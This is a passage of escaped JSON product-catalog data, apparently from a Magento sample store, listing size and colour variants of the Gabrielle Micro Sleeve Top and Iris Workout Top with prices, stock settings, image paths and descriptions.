config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws02-green_back.jpg\",\"image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws02-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1364\":{\"sku\":\"WS02-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Gabrielle Micro Sleeve Top-XL-Red\",\"description\":\"<p>Luma\'s most popular top, the Gabrielle Micro Sleeve is back with even more comfort and style.<\\/p>\\n<p>&bull; Lime green v-neck tee.<br \\/>&bull; Slimming, flattering fit.<br \\/>&bull; Moisture-wicking, quick-drying, anti-microbial, and anti-odor construction.<br \\/>&bull; Longer curved hem provides additional coverage.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gabrielle-micro-sleeve-top-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1365\":{\"sku\":\"WS02\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Gabrielle Micro Sleeve Top\",\"description\":\"<p>Luma\'s most popular top, the Gabrielle Micro Sleeve is back with even more comfort and style.<\\/p>\\n<p>&bull; Lime green v-neck tee.<br \\/>&bull; Slimming, flattering fit.<br \\/>&bull; Moisture-wicking, quick-drying, anti-microbial, and anti-odor construction.<br \\/>&bull; Longer curved hem provides additional coverage.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=Cotton|Hemp,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WS02-XS-Blue,size=XS,color=Blue|sku=WS02-XS-Green,size=XS,color=Green|sku=WS02-XS-Red,size=XS,color=Red|sku=WS02-S-Blue,size=S,color=Blue|sku=WS02-S-Green,size=S,color=Green|sku=WS02-S-Red,size=S,color=Red|sku=WS02-M-Blue,size=M,color=Blue|sku=WS02-M-Green,size=M,color=Green|sku=WS02-M-Red,size=M,color=Red|sku=WS02-L-Blue,size=L,color=Blue|sku=WS02-L-Green,size=L,color=Green|sku=WS02-L-Red,size=L,color=Red|sku=WS02-XL-Blue,size=XL,color=Blue|sku=WS02-XL-Green,size=XL,color=Green|sku=WS02-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws02-green_back.jpg\",\"image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws02-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"Cotton|Hemp\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"1366\":{\"sku\":\"WS03-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Iris Workout Top-XS-Blue\",\"description\":\"<p>The Iris Workout Top is sleeveless, body fitting and moisture wicking for a fashionable, functional garment. Rouched textures add style.<\\/p>\\n<p>&bull; Pink heather rouched v-neck.<br \\/>&bull; Scoop neckline.<br \\/>&bull; Angled flat seams.<br \\/>&bull; Moisture wicking.<br \\/>&bull; Body skimming.<br \\/>&bull; 83% Polyester \\/ 11% TENCEL&reg; Lyocell \\/ 6% Lycra&reg; Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"iris-workout-top-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1367\":{\"sku\":\"WS03-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Iris Workout Top-XS-Green\",\"description\":\"<p>The Iris Workout Top is sleeveless, body fitting and moisture wicking for a fashionable, functional garment. Rouched textures add style.<\\/p>\\n<p>&bull; Pink heather rouched v-neck.<br \\/>&bull; Scoop neckline.<br \\/>&bull; Angled flat seams.<br \\/>&bull; Moisture wicking.<br \\/>&bull; Body skimming.<br \\/>&bull; 83% Polyester \\/ 11% TENCEL&reg; Lyocell \\/ 6% Lycra&reg; Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"iris-workout-top-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"1368\":{\"sku\":\"WS03-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Iris Workout Top-XS-Red\",\"description\":\"<p>The Iris Workout Top is sleeveless, body fitting and moisture wicking for a fashionable, functional garment. Rouched textures add style.<\\/p>\\n<p>&bull; Pink heather rouched v-neck.<br \\/>&bull; Scoop neckline.<br \\/>&bull; Angled flat seams.<br \\/>&bull; Moisture wicking.<br \\/>&bull; Body skimming.<br \\/>&bull; 83% Polyester \\/ 11% TENCEL&reg; Lyocell \\/ 6% Lycra&reg; Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"iris-workout-top-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws03-red_alt1.jpg,\\/w\\/s\\/ws03-red_back.jpg\",\"image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws03-red_alt1.jpg,\\/w\\/s\\/ws03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"1369\":{\"sku\":\"WS03-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Iris Workout Top-S-Blue\",\"description\":\"<p>The Iris Workout Top is sleeveless, body fitting and moisture wicking for a fashionable, functional garment. Rouched textures add style.<\\/p>\\n<p>&bull; Pink heather rouched v-neck.<br \\/>&bull; Scoop neckline.<br \\/>&bull; Angled flat seams.<br \\/>&bull; Moisture wicking.<br \\/>&bull; Body skimming.<br \\/>&bull; 83% Polyester \\/ 11% TENCEL&reg; Lyocell \\/ 6% Lycra&reg; Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"iris-workout-top-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1370\":{\"sku\":\"WS03-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Iris Workout Top-S-Green\",\"description\":\"<p>The Iris Workout Top is sleeveless, body fitting and moisture wicking for a fashionable, functional garment. Rouched textures add style.<\\/p>\\n<p>&bull; Pink heather rouched v-neck.<br \\/>&bull; Scoop neckline.<br \\/>&bull; Angled flat seams.<br \\/>&bull; Moisture wicking.<br \\/>&bull; Body skimming.<br \\/>&bull; 83% Polyester \\/ 11% TENCEL&reg; Lyocell \\/ 6% Lycra&reg; Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"iris-workout-top-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"1371\":{\"sku\":\"WS03-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Iris Workout Top-S-Red\",\"description\":\"<p>The Iris Workout Top is sleeveless, body fitting and moisture wicking for a fashionable, functional garment. Rouched textures add style.<\\/p>\\n<p>&bull; Pink heather rouched v-neck.<br \\/>&bull; Scoop neckline.<br \\/>&bull; Angled flat seams.<br \\/>&bull; Moisture wicking.<br \\/>&bull; Body skimming.<br \\/>&bull; 83% Polyester \\/ 11% TENCEL&reg; Lyocell \\/ 6% Lycra&reg; Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"iris-workout-top-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws03-red_alt1.jpg,\\/w\\/s\\/ws03-red_back.jpg\",\"image\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws03-red_alt1.jpg,\\/w\\/s\\/ws03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"